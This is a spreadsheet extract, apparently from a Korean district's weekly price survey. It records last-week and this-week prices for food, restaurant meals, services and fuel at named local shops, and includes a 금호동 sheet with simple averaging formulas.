A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: 1 | E24: 1 | F24: 30,000 | G24: 30,000 | H24: 0 | I24: 광영농협 | L24: 0 | M24: 광영시장 | N24: 30,000 | O24: 30,000 | P24: 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: =COUNTIF(J25,"<>0")+COUNTIF(N25,"<>0") -> 2 | E25: 2 | F25: 13,440 | G25: 13,440 | H25: 0 | I25: 광영농협 | J25: 11,880 | K25: 11,880 | L25: 0 | M25: 광영시장 | N25: 15,000 | O25: 15,000 | P25: 0
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: 2 | E26: 2 | F26: 8,000 | G26: 7,250 | H26: -750 | I26: 광영농협 | J26: 8,500 | K26: 7,000 | L26: -1,500 | M26: 광영시장 | N26: 7,500 | O26: 7,500 | P26: 0
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: 2 | E27: 2 | F27: 8,050 | G27: 8,050 | H27: 0 | I27: 광영농협 | J27: 8,100 | K27: 8,100 | L27: 0 | M27: 광영시장 | N27: 8,000 | O27: 8,000 | P27: 0
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: 2 | E28: 2 | F28: 3,000 | G28: 3,000 | H28: 0 | I28: 광영농협 | J28: 2,500 | K28: 2,500 | L28: 0 | M28: 광영시장 | N28: 3,500 | O28: 3,500 | P28: 0
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: =COUNTIF(J29,"<>0")+COUNTIF(N29,"<>0") -> 2 | E29: 2 | F29: 4,975 | G29: 4,950 | H29: -25 | I29: 광영농협 | J29: 4,950 | K29: 4,900 | L29: -50 | M29: 광영시장 | N29: 5,000 | O29: 5,000 | P29: 0
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: 2 | E30: 2 | F30: 3,250 | G30: 3,250 | H30: 0 | I30: 광영농협 | J30: 3,500 | K30: 3,500 | L30: 0 | M30: 광영시장 | N30: 3,000 | O30: 3,000 | P30: 0
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: 2 | E31: 2 | F31: 2,700 | G31: 3,240 | H31: 540 | I31: 광영농협 | J31: 1,900 | K31: 2,980 | L31: 1,080 | M31: 광영시장 | N31: 3,500 | O31: 3,500 | P31: 0
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: 2 | E32: 2 | F32: 4,950 | G32: 4,950 | H32: 0 | I32: 광영농협 | J32: 4,900 | K32: 4,900 | L32: 0 | M32: 광영시장 | N32: 5,000 | O32: 5,000 | P32: 0
A33: 27 | B33: 콩 | C33: 1kg | D33: 2 | E33: 2 | F33: 8,320 | G33: 8,320 | H33: 0 | I33: 광영농협 | J33: 9,640 | K33: 9,640 | L33: 0 | M33: 광영시장 | N33: 7,000 | O33: 7,000 | P33: 0
A34: 28 | B34: 고춧가루 | C34: 3kg | D34: 2 | E34: 2 | F34: 95,300 | G34: 95,300 | H34: 0 | I34: 광영농협 | J34: 110,600 | K34: 110,600 | L34: 0 | M34: 광영시장 | N34: 80,000 | O34: 80,000 | P34: 0
A35: 개인서비스 요금(49개 품목)
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: 1 | E36: 1 | F36: =IF(D36=0,0,SUM(J36,N36)/D36) -> 9,000 | G36: 9,000 | H36: =G36-F36 -> 0 | I36: 이신자설렁탕 | J36: 9,000 | K36: 9,000 | L36: =K36-J36 -> 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: =COUNTIF(J37,"<>0")+COUNTIF(N37,"<>0") -> 2 | E37: 2 | F37: 7,000 | G37: 7,000 | H37: 0 | I37: 김가네 | J37: 7,000 | K37: 7,000 | L37: 0 | M37: 중앙칡냉면 (서울냉면) | N37: 7,000 | O37: 7,000 | P37: =O37-N37 -> 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: 2 | E38: 2 | F38: 6,750 | G38: 6,750 | H38: 0 | I38: 광영팥죽 (팔구식당) | J38: 8,000 | K38: 8,000 | L38: 0 | M38: 김밥천국 | N38: 5,500 | O38: 5,500 | P38: 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: 2 | E39: 2 | F39: 11,000 | G39: 11,000 | H39: 0 | I39: 이신자설렁탕 | J39: 12,000 | K39: 12,000 | L39: 0 | M39: 조선옥 | N39: 10,000 | O39: 10,000 | P39: 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: 2 | E40: 2 | F40: 14,500 | G40: 14,500 | H40: 0 | I40: 원진삼계탕 | J40: 14,000 | K40: 14,000 | L40: 0 | M40: 능이야산에가자 | N40: 15,000 | O40: 15,000 | P40: 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: 2 | E41: 2 | F41: 8,000 | G41: 8,000 | H41: 0 | I41: 팔구식당 | J41: 8,000 | K41: 8,000 | L41: 0 | M41: 호롱식당 (금호식당) | N41: 8,000 | O41: 8,000 | P41: 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: 2 | E42: 2 | F42: 8,000 | G42: 8,000 | H42: 0 | I42: 팔구식당 | J42: 8,000 | K42: 8,000 | L42: 0 | M42: 호롱식당 (금호식당) | N42: 8,000 | O42: 8,000 | P42: 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: 2 | E43: 2 | F43: 20,290 | G43: 20,290 | H43: 0 | I43: 조선옥 | J43: 28,580 | K43: 28,580 | L43: 0 | M43: 맛내골 | N43: 12,000 | O43: 12,000 | P43: 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: 2 | E44: 2 | F44: 34,770 | G44: 34,770 | H44: 0 | I44: 조선옥 | J44: 41,540 | K44: 41,540 | L44: 0 | M44: 부광참숯불구이 | N44: 28,000 | O44: 28,000 | P44: 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: 0 | E45: 0 | F45: 0 | G45: 0 | H45: 0 | I45: 없음 | J45: 0 | K45: 0 | L45: 0 | M45: 없음 | N45: 0 | O45: 0 | P45: 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: 2 | E46: 2 | F46: 18,000 | G46: 18,000 | H46: 0 | I46: 아주커통닭 | J46: 18,000 | K46: 18,000 | L46: 0 | M46: 네네치킨 | N46: 18,000 | O46: 18,000 | P46: 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: 2 | E47: 2 | F47: 7,500 | G47: 7,500 | H47: 0 | I47: 광영팥죽 (바지락칼국수) | J47: 7,000 | K47: 7,000 | L47: 0 | M47: 짱칼국수 | N47: 8,000 | O47: 8,000 | P47: 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: 2 | E48: 2 | F48: 4,000 | G48: 4,000 | H48: 0 | I48: 광영팥죽 (김가네) | J48: 4,000 | K48: 4,000 | L48: 0 | M48: 꼬마김밥여행 | N48: 4,000 | O48: 4,000 | P48: 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: 2 | E49: 2 | F49: 3,750 | G49: 3,750 | H49: 0 | I49: 광영팥죽 (김가네) | J49: 3,500 | K49: 3,500 | L49: 0 | M49: 꼬마김밥여행 | N49: 4,000 | O49: 4,000 | P49: 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: 2 | E50: 2 | F50: 6,000 | G50: 6,000 | H50: 0 | I50: 자금성 | J50: 6,000 | K50: 6,000 | L50: 0 | M50: 장수관 | N50: 6,000 | O50: 6,000 | P50: 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: 2 | E51: 2 | F51: 8,000 | G51: 8,000 | H51: 0 | I51: 자금성 | J51: 7,000 | K51: 7,000 | L51: 0 | M51: 장수관 | N51: 9,000 | O51: 9,000 | P51: 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: 2 | E52: 2 | F52: 17,500 | G52: 17,500 | H52: 0 | I52: 자금성 | J52: 17,000 | K52: 17,000 | L52: 0 | M52: 장수관 | N52: 18,000 | O52: 18,000 | P52: 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: 2 | E53: 2 | F53: 7,000 | G53: 7,000 | H53: 0 | I53: 김가네 | J53: 8,000 | K53: 8,000 | L53: 0 | M53: 김밥천국 | N53: 6,000 | O53: 6,000 | P53: 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: 2 | E54: 2 | F54: 3,500 | G54: 3,500 | H54: 0 | I54: 하나베이커리 | J54: 3,000 | K54: 3,000 | L54: 0 | M54: 브레드빈 | N54: 4,000 | O54: 4,000 | P54: 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: =COUNTIF(J55,"<>0")+COUNTIF(N55,"<>0") -> 2 | E55: 2 | F55: 11,950 | G55: 11,950 | H55: 0 | I55: 히트피자 | J55: 13,000 | K55: 13,000 | L55: 0 | M55: 피자스쿨 | N55: 10,900 | O55: 10,900 | P55: 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: 2 | E56: 2 | F56: 3,750 | G56: 3,750 | H56: 0 | I56: 데일리에 스프레소 | J56: 3,500 | K56: 3,500 | L56: 0 | M56: 단Dan | N56: 4,000 | O56: 4,000 | P56: 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: 2 | E57: 2 | F57: 4,000 | G57: 4,000 | H57: 0 | I57: 데일리에 스프레소 | J57: 4,000 | K57: 4,000 | L57: 0 | M57: 단Dan | N57: 4,000 | O57: 4,000 | P57: 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: 2 | E58: 2 | F58: 12,340 | G58: 12,340 | H58: 0 | I58: 조선옥 | J58: 14,680 | K58: 14,680 | L58: 0 | M58: 부광참숯불구이 | N58: 10,000 | O58: 10,000 | P58: 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: 2 | E59: 2 | F59: 12,500 | G59: 12,500 | H59: 0 | I59: 조선옥 | J59: 12,000 | K59: 12,000 | L59: 0 | M59: 화성숯불돼지갈비 | N59: 13,000 | O59: 13,000 | P59: 0
A60: 25 | B60: 쇠갈비 | C60: 식육식당 200g(국내산) | D60: 1 | E60: 1 | F60: 41,250 | G60: 41,250 | H60: 0 | I60: 조선옥 | J60: 41,250 | K60: 41,250 | L60: 0 | M60: 업종변경 (고기나라) | N60: 0 | O60: 0 | P60: 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: 2 | E61: 2 | F61: 3,500 | G61: 3,500 | H61: 0 | I61: 변사또 | J61: 3,500 | K61: 3,500 | L61: 0 | M61: 김복남맥주1995 | N61: 3,500 | O61: 3,500 | P61: 0
A62: 27 | B62: 공동 주택관리비 | C62: 목우 18평1개월 (공과금 제외) | D62: 2 | E62: 2 | F62: 61,500 | G62: 61,500 | H62: 0 | I62: 가야아파트 | J62: 74,000 | K62: 74,000 | L62: 0 | M62: 현대저층아파트 | N62: 49,000 | O62: 49,000 | P62: 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: 2 | E63: 2 | F63: 12,000 | G63: 12,000 | H63: 0 | I63: 대도세탁소 | J63: 12,000 | K63: 12,000 | L63: 0 | M63: 뉴스타세탁소 | N63: 12,000 | O63: 12,000 | P63: 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: 2 | E64: 2 | F64: 6,000 | G64: 6,000 | H64: 0 | I64: 대도세탁소 | J64: 6,000 | K64: 6,000 | L64: 0 | M64: 뉴스타세탁소 | N64: 6,000 | O64: 6,000 | P64: 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: 0 | E65: 0 | F65: 0 | G65: 0 | H65: 0 | I65: 없음 | M65: 없음
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: 0 | E66: 0 | F66: 0 | G66: 0 | H66: 0 | I66: 없음 | M66: 없음
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: 0 | E67: 0 | F67: 0 | G67: 0 | H67: 0 | I67: 없음 | M67: 없음
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: 0 | E68: 0 | F68: 0 | G68: 0 | H68: 0 | I68: 없음 | M68: 없음
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: 2 | E69: 2 | F69: 175,000 | G69: 175,000 | H69: 0 | I69: 그린골프장 (조프로골프) | J69: 150,000 | K69: 150,000 | L69: =K69-J69 -> 0 | M69: 광영골프장 | N69: 200,000 | O69: 200,000 | P69: =O69-N69 -> 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: =COUNTIF(J70,"<>0")+COUNTIF(N70,"<>0") -> 2 | E70: 2 | F70: 25,000 | G70: 25,000 | H70: 0 | I70: J J노래방 (업종변경) | J70: 25,000 | K70: 25,000 | L70: 0 | M70: 열정노래방 | N70: 25,000 | O70: 25,000 | P70: 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: 2 | E71: 2 | F71: 10,500 | G71: 10,500 | H71: 0 | I71: 당돌이 당구장 | J71: 9,000 | K71: 9,000 | L71: 0 | M71: 월드당구장 | N71: 12,000 | O71: 12,000 | P71: 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: 2 | E72: 2 | F72: 18,000 | G72: 18,000 | H72: 0 | I72: 대성사진관 | J72: 18,000 | K72: 18,000 | L72: 0 | M72: 디지털포토 | N72: 18,000 | O72: 18,000 | P72: 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: 2 | E73: 2 | F73: 2,000 | G73: 2,000 | H73: 0 | I73: 대성사진관 | J73: 2,000 | K73: 2,000 | L73: 0 | M73: 디디지털포토 | N73: 2,000 | O73: 2,000 | P73: 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: 0 | E74: 0 | F74: 0 | G74: 0 | H74: 0 | I74: 없음 | M74: 없음 | P74: 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: =COUNTIF(J75,"<>0")+COUNTIF(N75,"<>0") -> 2 | E75: 2 | F75: 17,500 | G75: 17,500 | H75: 0 | I75: 명동이발관 | J75: 18,000 | K75: 18,000 | L75: =K75-J75 -> 0 | M75: 경민이발관 | N75: 17,000 | O75: 17,000 | P75: 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: 2 | E76: 2 | F76: 60,000 | G76: 60,000 | H76: 0 | I76: 시집가는날 | J76: 60,000 | K76: 60,000 | L76: 0 | M76: 강나영헤어&헤드스파 | N76: 60,000 | O76: 60,000 | P76: 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: 2 | E77: 2 | F77: 8,250 | G77: 8,250 | H77: 0 | I77: 스파렉스 | J77: 9,500 | K77: 9,500 | L77: 0 | M77: 궁전사우나 | N77: 7,000 | O77: 7,000 | P77: 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: 0 | E78: 0 | F78: 0 | G78: 0 | H78: 0 | I78: 없음 | M78: 없음
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: =COUNTIF(J79,"<>0")+COUNTIF(N79,"<>0") -> 2 | E79: 2 | F79: 40,000 | G79: 40,000 | H79: 0 | I79: 모리스모텔 | J79: 40,000 | K79: 40,000 | L79: =K79-J79 -> 0 | M79: 코리아모텔 | N79: 40,000 | O79: 40,000 | P79: =O79-N79 -> 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: 0 | E80: 0 | I80: 없음 | M80: 없음
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: =COUNTIF(J81,"<>0")+COUNTIF(N81,"<>0") -> 2 | E81: 2 | F81: =IF(D81=0,0,SUM(J81,N81)/D81) -> 1,200 | G81: 1,200 | H81: =G81-F81 -> 0 | I81: 초콜렛pc존 | J81: 1,200 | K81: 1,200 | L81: =K81-J81 -> 0 | M81: 몬스터pc | N81: 1,200 | O81: 1,200 | P81: =O81-N81 -> 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: 1 | E82: 1 | F82: 16,000 | G82: 16,000 | H82: 0 | I82: CJ택배 | J82: 8,000 | K82: 8,000 | L82: 0 | M82: 우체국택배 (추가) | N82: 8,000 | O82: 8,000 | P82: 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: 1 | E83: 1 | F83: 12,000 | G83: 12,000 | H83: 0 | I83: 스파렉스 | J83: 12,000 | K83: 12,000 | L83: 0 | M83: 없음 | P83: 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: 0 | E84: 0 | I84: 없음 | M84: 없음 | P84: 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: =COUNTIF(J86,"<>0")+COUNTIF(N86,"<>0") -> 2 | E86: 2 | F86: =IF(D86=0,0,SUM(J86,N86)/D86) -> 5,625 | G86: 5,625 | H86: =G86-F86 -> 0 | I86: 광영농협 | J86: 5,350 | K86: 5,350 | L86: =K86-J86 -> 0 | M86: G마트 | N86: 5,900 | O86: 5,900 | P86: =O86-N86 -> 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: 2 | E87: 2 | F87: 990 | G87: 990 | H87: 0 | I87: 광영농협 | J87: 990 | K87: 990 | L87: 0 | M87: G마트 | N87: 990 | O87: 990 | P87: 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: 2 | E88: 2 | F88: 1,140 | G88: 1,140 | H88: 0 | I88: 광영농협 | J88: 1,080 | K88: 1,080 | L88: 0 | M88: G마트 | N88: 1,200 | O88: 1,200 | P88: 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: 2 | E89: 2 | F89: 7,730 | G89: 6,040 | H89: -1,690 | I89: 광영농협 | J89: 8,480 | K89: 5,100 | L89: -3,380 | M89: G마트 | N89: 6,980 | O89: 6,980 | P89: 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: 2 | E90: 2 | F90: 2,530 | G90: 2,530 | H90: 0 | I90: 광영농협 | J90: 2,380 | K90: 2,380 | L90: 0 | M90: G마트 | N90: 2,680 | O90: 2,680 | P90: 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: 2 | E91: 2 | F91: 515 | G91: 515 | H91: 0 | I91: 광영농협 | J91: 480 | K91: 480 | L91: 0 | M91: G마트 | N91: 550 | O91: 550 | P91: 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: 2 | E92: 2 | F92: 1,615 | G92: 1,615 | H92: 0 | I92: 광영농협 | J92: 1,550 | K92: 1,550 | L92: 0 | M92: G마트 | N92: 1,680 | O92: 1,680 | P92: 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: 2 | E93: 2 | F93: 1,395 | G93: 1,395 | H93: 0 | I93: 광영농협 | J93: 1,390 | K93: 1,390 | L93: 0 | M93: G마트 | N93: 1,400 | O93: 1,400 | P93: 0
A94: 9 | B94: 등유 | C94: 주유소 판매 1ℓ | D94: 0 | E94: 0 | F94: 0 | G94: 0 | H94: 0 | I94: 제철주유소 | J94: 0 | K94: 0 | L94: 0 | M94: 광영주유소 | N94: 0 | O94: 0 | P94: 0
A95: 10 | B95: 경유 | C95: 주유소 판매 1ℓ | D95: =COUNTIF(J95,"<>0")+COUNTIF(N95,"<>0") -> 2 | E95: 2 | F95: 1,604 | G95: 1,594 | H95: -10 | I95: 제철주유소 | J95: 1,578 | K95: 1,558 | L95: -20 | M95: 광영주유소 | N95: 1,629 | O95: 1,629 | P95: 0
A96: 11 | B96: 휘발유 | C96: 주유소 판매 1ℓ (무연) | D96: 2 | E96: 2 | F96: 1,634 | G96: 1,629 | H96: -5 | I96: 제철주유소 | J96: 1,608 | K96: 1,598 | L96: -10 | M96: 광영주유소 | N96: 1,659 | O96: 1,659 | P96: 0
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: 2 | E97: 2 | F97: 140,000 | G97: 140,000 | H97: 0 | I97: 그라미피아노 | J97: 140,000 | K97: 140,000 | L97: 0 | M97: 유신영피아노 | N97: 140,000 | O97: 140,000 | P97: 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: 1 | E98: 1 | F98: 120,000 | G98: 120,000 | H98: 0 | I98: 선영미술학원 | J98: 120,000 | K98: 120,000 | L98: 0 | P98: 0

Sheet 금호동
A2: 주간 물간동향 (금호동)
M3: 조사자 : 김보미
A4: 연번 | B4: 품목 | C4: 규격·단위 | F4: 평 균 | I4: 조 사 1 지 역(GS수퍼) | M4: 조 사 2 지 역(웰빙마트)
F5: 전주 | G5: 금주 | H5: 증감액 | I5: 조 사 처 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 조 사 처 | N5: 전주 | O5: 금주 | P5: 증감액
A6: 농·축·수산물(28개 품목)
A7: 1 | B7: 쌀 | C7: 일반미 20kg(웰빙간척) | D7: 2 | E7: =COUNTIF(K7,"<>0")+COUNTIF(O7,"<>0") -> 2 | F7: =IF(D7=0,0,SUM(J7,N7)/D7) -> 61,900 | G7: 61,900 | H7: =G7-F7 -> 0 | I7: GS슈퍼 | J7: 65800 | K7: 65800 | L7: =K7-J7 -> 0 | M7: 웰빙마트 | N7: 58000 | O7: 58000 | P7: =O7-N7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: =COUNTIF(J8,"<>0")+COUNTIF(N8,"<>0") -> 2 | E8: =COUNTIF(K8,"<>0")+COUNTIF(O8,"<>0") -> 2 | F8: 1,465 | G8: 1,080 | H8: -385 | I8: GS슈퍼 | J8: 1480 | K8: 980 | L8: -500 | M8: 웰빙마트 | N8: 1450 | O8: 1180 | P8: -270
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: =COUNTIF(J9,"<>0")+COUNTIF(N9,"<>0") -> 2 | E9: =COUNTIF(K9,"<>0")+COUNTIF(O9,"<>0") -> 2 | F9: 4,875 | G9: 5,500 | H9: 625 | I9: GS슈퍼 | J9: 4950 | K9: 6200 | L9: 1250 | M9: 웰빙마트 | N9: 4800 | O9: 4800 | P9: 0
A10: 4 | B10: 양상추 | C10: 상품1개(350~400g) | D10: 2 | E10: 2 | F10: 4,659 | G10: 4,259 | H10: -400 | I10: GS슈퍼 | J10: 4768 | K10: 3968 | L10: -800 | M10: 웰빙마트 | N10: 4550 | O10: 4550 | P10: 0
A11: 5 | B11: 애호박 | C11: 상품1개(300~350g) | D11: 2 | E11: 2 | F11: 1,390 | G11: 1,605 | H11: 215 | I11: GS슈퍼 | J11: 1380 | K11: 1680 | L11: 300 | M11: 웰빙마트 | N11: 1400 | O11: 1530 | P11: 130
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: 1 | E12: 1 | F12: 19,920 | G12: 19,920 | H12: 0 | I12: GS슈퍼 | J12: 19920 | K12: 19920 | L12: 0 | M12: 웰빙마트 | N12: 0 | O12: 0 | P12: 0
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: =COUNTIF(J13,"<>0")+COUNTIF(N13,"<>0") -> 2 | E13: 2 | F13: 2,245 | G13: 2,325 | H13: 80 | I13: GS슈퍼 | J13: 2220 | K13: 2380 | L13: 160 | M13: 웰빙마트 | N13: 2270 | O13: 2270 | P13: 0
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: 2 | E14: =COUNTIF(K14,"<>0")+COUNTIF(O14,"<>0") -> 2 | F14: 4,240 | G14: 4,015 | H14: -225 | I14: GS슈퍼 | J14: 3980 | K14: 3780 | L14: -200 | M14: 웰빙마트 | N14: 4500 | O14: 4250 | P14: -250
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: 2 | E15: 2 | F15: 16,450 | G15: 16,435 | H15: -15 | I15: GS슈퍼 | J15: 19900 | K15: 19870 | L15: -30 | M15: 웰빙마트 | N15: 13000 | O15: 13000 | P15: 0
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: 2 | E16: 2 | F16: 18,150 | G16: 18,150 | H16: 0 | I16: GS슈퍼 | J16: 19800 | K16: 19800 | L16: 0 | M16: 웰빙마트 | N16: 16500 | O16: 16500 | P16: 0
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: 2 | E17: 2 | F17: 3,360 | G17: 3,875 | H17: 515 | I17: GS슈퍼 | J17: 3320 | K17: 4350 | L17: 1030 | M17: 웰빙마트 | N17: 3400 | O17: 3400 | P17: 0
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: 2 | E18: 2 | F18: 3,750 | G18: 3,665 | H18: -85 | I18: GS슈퍼 | J18: 3420 | K18: 3250 | L18: -170 | M18: 웰빙마트 | N18: 4080 | O18: 4080 | P18: 0
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: 2 | E19: 2 | F19: 2,500 | G19: 2,500 | H19: 0 | I19: GS슈퍼 | J19: 2600 | K19: 2600 | L19: 0 | M19: 웰빙마트 | N19: 2400 | O19: 2400 | P19: 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: 2 | E20: 2 | F20: 3,500 | G20: 3,500 | H20: 0 | I20: GS슈퍼 | J20: 4500 | K20: 4500 | L20: 0 | M20: 웰빙마트 | N20: 2500 | O20: 2500 | P20: 0
A21: 15 | B21: 배 | C21: (600-700) | D21: 2 | E21: 2 | F21: 3,990 | G21: 3,990 | H21: 0 | I21: GS슈퍼 | J21: 4980 | K21: 4980 | L21: 0 | M21: 웰빙마트 | N21: 3000 | O21: 3000 | P21: 0
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: 2 | E22: 2 | F22: 4,665 | G22: 4,315 | H22: -350 | I22: GS슈퍼 | J22: 4980 | K22: 4280 | L22: -700 | M22: 웰빙마트 | N22: 4350 | O22: 4350 | P22: 0
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: 2 | E23: 2 | F23: 83,301 | G23: 88,299 | H23: 4,998 | I23: GS슈퍼 | J23: 79602 | K23: 89598 | L23: 9996 | M23: 웰빙마트 | N23: 87000 | O23: 87000 | P23: 0
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: 1 | E24: 1 | F24: 27,600 | G24: 25,602 | H24: -1,998 | I24: GS슈퍼 | J24: 27600 | K24: 25602 | L24: -1998 | M24: 웰빙마트 | N24: 0 | O24: 0 | P24: 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: =COUNTIF(J25,"<>0")+COUNTIF(N25,"<>0") -> 2 | E25: 2 | F25: 17,280 | G25: 17,130 | H25: -150 | I25: GS슈퍼 | J25: 18960 | K25: 20160 | L25: 1200 | M25: 웰빙마트 | N25: 15600 | O25: 14100 | P25: -1500
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: 2 | E26: 2 | F26: 9,930 | G26: 9,930 | H26: 0 | I26: GS슈퍼 | J26: 10960 | K26: 10960 | L26: 0 | M26: 웰빙마트 | N26: 8900 | O26: 8900 | P26: 0
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: 2 | E27: 2 | F27: 8,790 | G27: 8,790 | H27: 0 | I27: GS슈퍼 | J27: 8980 | K27: 8980 | L27: 0 | M27: 웰빙마트 | N27: 8600 | O27: 8600 | P27: 0
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: 1 | E28: 1 | F28: 0 | G28: 0 | H28: 0 | I28: GS슈퍼 | L28: 0 | M28: 웰빙마트 | N28: 0 | O28: 0 | P28: 0
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: 1 | E29: 1 | F29: 1,960 | G29: 3,420 | H29: 1,460 | I29: GS슈퍼 | J29: 1960 | K29: 3420 | L29: 1460 | M29: 웰빙마트 | N29: 0 | O29: 0 | P29: 0
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: 1 | E30: 1 | F30: 0 | G30: 0 | H30: 0 | I30: GS슈퍼 | L30: 0 | M30: 웰빙마트 | N30: 0 | O30: 0 | P30: 0
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: 1 | E31: 1 | F31: 4,800 | G31: 4,800 | H31: 0 | I31: GS슈퍼 | J31: 4800 | K31: 4800 | L31: 0 | M31: 웰빙마트 | N31: 0 | O31: 0 | P31: 0
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: 1 | E32: 1 | F32: 2,950 | G32: 1,920 | H32: -1,030 | I32: GS슈퍼 | J32: 2950 | K32: 1920 | L32: -1030 | M32: 웰빙마트 | N32: 0 | O32: 0 | P32: 0
A33: 27 | B33: 콩 | C33: 1kg | D33: 1 | E33: 1 | F33: 15,110 | G33: 15,110 | H33: 0 | I33: GS슈퍼 | J33: 15110 | K33: 15110 | L33: 0 | M33: 웰빙마트 | N33: 0 | O33: 0 | P33: 0
